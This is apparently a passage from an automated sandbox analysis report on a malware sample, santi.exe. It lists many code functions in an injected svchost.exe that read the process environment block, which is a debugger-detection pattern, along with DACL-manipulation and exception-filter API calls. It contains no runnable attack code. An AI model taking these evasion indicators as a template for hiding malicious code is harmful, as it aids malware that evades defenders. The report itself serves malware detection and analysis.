                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_032B05A7 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_032B05A7 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_032B05A7 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_032545B1 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_032545B1 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03232582 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03232582 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03264588 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0326E59C mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0325E5E7 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0325E5E7 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0325E5E7 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0325E5E7 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0325E5E7 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0325E5E7 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0325E5E7 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0325E5E7 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_032325E0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0326C5ED mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0326C5ED mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0326E5CF mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0326E5CF mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_032365D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0326A5D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0326A5D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0322E420 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0322E420 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0322E420 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0322C427 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_032B6420 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_032B6420 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_032B6420 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_032B6420 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_032B6420 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_032B6420 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_032B6420 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0326A430 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03268402 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03268402 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03268402 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_032BC460 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0325A470 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0325A470 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0325A470 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0326E443 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0326E443 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0326E443 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0326E443 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0326E443 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0326E443 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0326E443 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0326E443 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0322645D mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0325245A mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_032364AB mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_032644B0 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_032BA4B0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_032304E5 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0325EB20 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0325EB20 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_032F8B28 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_032F8B28 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_032AEB1D mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_032AEB1D mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_032AEB1D mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_032AEB1D mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_032AEB1D mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_032AEB1D mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_032AEB1D mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_032AEB1D mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_032AEB1D mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0322CB7E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_032C6B40 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_032C6B40 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_032FAB40 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_032D8B42 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03240BBE mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03240BBE mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03238BF0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03238BF0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03238BF0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0325EBFC mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_032BCBF0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03250BCB mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03250BCB mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03250BCB mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03230BCD mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03230BCD mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03230BCD mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_032DEBD0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0326CA24 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0325EA2E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03254A35 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03254A35 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0326CA38 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_032BCA11 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0326CA6F mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0326CA6F mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0326CA6F mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_032ACA72 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_032ACA72 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03236A50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03236A50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03236A50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03236A50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03236A50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03236A50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03236A50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03240A5B mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03240A5B mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03238AA0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03238AA0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03286AA4 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0323EA80 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0323EA80 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0323EA80 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0323EA80 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0323EA80 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0323EA80 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0323EA80 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0323EA80 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0323EA80 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03304A80 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03268A90 mov edx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0326AAEE mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0326AAEE mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03286ACC mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03286ACC mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03286ACC mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03230AD0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03264AD0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03264AD0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_032B892A mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_032C892B mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_032AE908 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_032AE908 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_032BC912 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03228918 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03228918 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03256962 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03256962 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03256962 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0327096E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0327096E mov edx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0327096E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_032D4978 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_032D4978 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_032BC97C mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_032B0946 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_032429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_032429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_032429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_032429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_032429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_032429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_032429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_032429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_032429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_032429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_032429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_032429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_032429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_032309AD mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_032309AD mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_032B89B3 mov esi, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_032B89B3 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_032B89B3 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_032BE9E0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_032629F9 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_032629F9 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_032C69C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0323A9D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0323A9D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0323A9D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0323A9D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0323A9D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0323A9D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_032649D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_032FA9D3 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03252835 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03252835 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03252835 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03252835 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03252835 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03252835 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0326A830 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_032D483A mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_032D483A mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_032BC810 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_032BE872 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_032BE872 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_032C6870 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_032C6870 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03242840 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03260854 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03234859 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03234859 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03230887 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_032BC89D mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_032FA8E4 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0326C8F9 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0326C8F9 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0325E8C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0325EF28 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_032E6F00 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03232F12 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0326CF1F mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0325AF69 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0325AF69 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03304F68 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_032B4F40 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_032B4F40 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_032B4F40 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_032B4F40 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0322CF50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0322CF50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0322CF50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0322CF50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0322CF50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0322CF50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0326CF50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_032D0F50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0326CF80 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03262F98 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03262F98 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0324CFE0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0324CFE0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03270FF6 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03270FF6 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03270FF6 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03270FF6 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03304FE7 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_032E6FF7 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03232FC8 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03232FC8 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03232FC8 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03232FC8 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0322EFD8 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0322EFD8 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0322EFD8 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_032C6E20 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_032C6E20 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_032C6E20 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0325AE00 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0325AE00 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0325AE00 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\santi.exe | Code function: 0_2_0031A66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
                Source: C:\Users\user\Desktop\santi.exe | Code function: 0_2_003081AC SetUnhandledExceptionFilter,UnhandledExceptionFilter
                Source: C:\Users\user\Desktop\santi.exe | Code function: 0_2_00308189 SetUnhandledExceptionFilter

                HIPS / PFW / Operating System Protection Evasion

